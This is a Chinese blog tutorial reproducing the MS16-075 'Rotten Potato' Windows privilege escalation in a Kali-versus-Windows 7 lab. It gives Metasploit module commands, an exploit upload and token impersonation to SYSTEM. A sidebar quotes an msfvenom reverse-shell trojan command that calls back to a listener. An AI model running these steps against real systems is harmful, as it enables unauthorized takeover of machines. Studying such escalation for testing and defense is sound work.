烂土豆提权(MS16-075)--令牌窃取提权

最新推荐文章于 2024-04-18 19:36:30 发布
最新推荐文章于 2024-04-18 19:36:30 发布
阅读量3.8k 收藏 10
点赞数 1
分类专栏: CVE Windows系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/117361773
版权

漏洞介绍

当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。
若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转发请求的方式来修复此漏洞。
注:烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户
漏洞编号:CVE-2016-3225

漏洞复现

环境:攻击机(kali 192.168.211.129)
靶机(win7 192.168.211.128)
首先获得一个session
在这里插入图片描述

利用msf自带提权模块进行提权

模块:multi/recon/local_exploit_suggester
1.首先查看该机器可以利用的提权有哪些
命令:use multi/recon/local_exploit_suggester
show options
set session 1
run
在这里插入图片描述
可看到可以利用的提权都会显示出来
2.使用ms16-075
命令:use exploit/windows/local/ms16_075_reflection
show options
set session 1
exploit
在这里插入图片描述
在这里插入图片描述
发现没有返回session
那么我们使用下面的模块再试一次
命令:use exploit/windows/local/ms16_075_reflection_juicy
show options
set session 1
exploit
在这里插入图片描述
在这里插入图片描述
仍然没有返回session,那么我们只好自己下载exp进行提权了

利用GitHub下载ms16-075的exp提权

下载地址:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
下载好后通过meterpreter进行上传
命令:upload /home/hdh/potato.exe c:/
在这里插入图片描述
然后执行如下命令:
use incognito:加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
list_tokens -u:列出目标主机用户的可用令牌
在这里插入图片描述
继续执行如下命令:
execute -CH -f c:/potato.exe 创建新的进程
list_tokens -u 列出目标主机的可用令牌
impersonate_token “NT AUTHORITY\SYSTEM” 假冒目标主机上的可用令牌
在这里插入图片描述
本应该成功,这里不知道为什么不成功
然后getuid查看将会看到system权限

番茄酱料
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
土豆提权神器(改进版)
04-15
本工具从原版土豆工具里进行修改以避免每次在使用时都需要输入复杂的命令,使用方法如下: 假如操作系统是windows 2008 R2,则在命令提示符中,首先切换到该工具所在的目录,然后输入JuicyPotato.exe -p "这里粘贴想要执行的系统命令" 即可获得system权限(该工具在git hubu上)。具体的使用方法请查看本人的文章:服务器提权常见方法介绍。 本着免费分享的原则,下载时不需要扣除用户的积分,可放心和使用。同时由于本工具涉及的敏感操作,杀毒软件一定会报毒,可添加信任,如果不放心,请在虚拟机中使用。
土豆 (ms16-075) 提权方法
good good study
03-11 9907
所谓的土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。
Windows土豆提权复现(MS16-075)
oiadkt的博客
03-08 2056
Windows土豆提权复现(MS16-075)
Windows提权土豆
最新发布
2401_84275261的博客
04-18 552
我们今天利用土豆来对windows进行提权;靶机:windows-2003我们先用kali的msf工具生成一个木马。msf启动命令:msfconsole,或者直接输入命令来生成木马这里先启动msf然后我们生成木马最后通过通过中国菜刀将我们生成的木马放入目标网站启动msf的监听状态设置参数。接下来用最常规的方法提权,发现提权失败我们需要查找可以利用的漏洞,今天以“土豆”为例作为演示设置对应的参数,并开始攻击结果还是不能成功拿到权限,我们可以用伪造token值(在身份认证中,token是令牌(临时)的意思,
ms16-075提权
lansefly1990的专栏
02-27 2823
利用windows-exploit-suggester.py脚本,查找系统未打补丁有哪些,脚本下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester 利用ms16-135内核漏洞提权, powershell -nop -exec bypass -c "& {Import-Module 'C:\Users ...
Windows提权
haoge1998的博客
04-25 4809
Windows提权 Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的权限。主要权限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制权 Guest:来宾账号,基本权限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
Meterpreter 提权
eli的博客
05-20 2169
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
Potato家族提权学习
include_voidmain的博客
10-24 1031
Potato家族提权学习
ms16075提权Windows Server 2008
可爱的我可爱的code
11-19 717
欢迎大家去我博客查看原文:http://www.xpshuai.cn/posts/29481/ 光看网上的文章是不够的,还是要多动手才行 ms16-075漏洞简介 Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 漏洞详情,请戳这里 开始动手 1.假设是msfvenom生成木马,目标.
一次完整的渗透测试
qq_63980959的博客
04-21 533
这个一个完整的渗透测试实例。
ms16-032本地溢出漏洞
06-27
ms16-032的情况下,攻击者可能会利用此漏洞在目标系统上执行任意代码,从而获得系统的完全控制权。这种类型的漏洞特别危险,因为攻击者无需远程访问,只需要本地权限即可发动攻击,比如通过诱使用户打开恶意文件或...
windows提权-快速查找exp(第一课).docx
04-26
\n\n以上只是部分示例,实际中还有许多其他漏洞可以被攻击者利用,例如MS16-111、MS16-098、MS16-075等。每种漏洞都有其独特的利用方式,攻击者可能会结合多种技术来绕过安全防护,达到提权目的。\n\n对于防御者来说...
057-红队测试之Windows提权小结.pdf
09-20
Windows 提权小结 Windows 提权是指攻击者通过利用操作系统或软件应用程序中的漏洞、设计缺陷或配置错误来获得不允许的访问权限。这种权限升级可以使攻击者获得更高的访问权限,从而控制系统或访问敏感文件。 ...
Z1-AggressorScripts:适用于Cobalt Strike的插件
04-30
Z1-AggressorScripts 适用于Cobalt Strike 3.x & 4.x 的插件。 2020.12.20 更新: 更新工具。 2020.11.21 更新: 辅助模块的zip打包更换成uknow师傅的,...提权 获取可提取漏洞 juicypotato MS14-058 MS15-051 MS16-016
QD77MS-CN定位模块中文使用手册.zip
11-09
《QD77MS-CN定位模块中文使用手册》是一份专为用户提供的详细技术文档,旨在帮助用户理解和操作QD77MS-CN定位模块。该手册涵盖了模块的基本介绍、功能特性、硬件结构、软件配置、安装步骤、操作指南以及常见问题解答...
土豆配合令牌窃取提权复现
m0_65096687的博客
05-13 165
土豆配合令牌窃取提权是用来解决普通令牌窃取提权因为webshell权限太低无法提权成功。1.先用msf生成一个windows的后门监听上线。4.使用msf自带的令牌窃取功能。环境:内网kali和win10。3.利用msf上传土豆。先查看一下未提权的权限。2.在网上下载土豆
MSF+土豆家族窃取访问令牌提权
m0_65554829的博客
11-17 422
在Rotten Potato中使用的 COM 对象为BITS,而Juicy Potato为不同 Windows 版本提供了多个可以利用的COM对象。#在https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md上查找要加载的COM对象的CLSID。在之后的版本中,微软通过检查RPC绑定字符串中指定的端口来修复了这个问题,修复后的系统无法通 过原来的方法实现中间人攻击。# -c,指定要加载的COM对象的CLSID。
Windows权限提升—溢出提权
剁椒鱼头没剁椒的博客
03-16 2642
这里需要我们了解的权限提升大概分为:后台权限,网站权限,数据本权限。接口权限,系统权限。域控权限等。此提权方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以提权提升的exp。不过这里需要注意,只要对应的补丁号加上对应的系统的版本的提权exp才可以成功,有时候如果查找到提权exp提权不成功,那么就可以查看是不是系统版本没对应上,且不排除一些提权漏洞利用需要相应的环境。
windows提权土豆(RottenPotato)及Juicy Potato提权
热门推荐
negnegil的博客
09-11 1万+
介绍 土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012 土豆下载地址: https://github.com/foxglovesec/Potato 土豆提权原理: 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
6.Xray工具可以发现下面哪种漏洞(2分) A.XSS B.shiro C. ms17-017 D. ms16-075
06-13
正确答案是 A。Xray 是一款功能强大的 Web 漏洞扫描工具,可以发现多种类型的漏洞,包括 XSS、SQL 注入、文件包含等。而在选项中,只有 XSS 漏洞是可以被 Xray 发现的,其他的漏洞类型不在 Xray 的扫描范围之内。因此,选项 A 是正确答案。选项 B 中的 shiro 是一个 Java 安全框架,不是漏洞类型。选项 C 和 D 中的 ms17-017 和 ms16-075 是 Windows 操作系统的漏洞编号,也不是漏洞类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值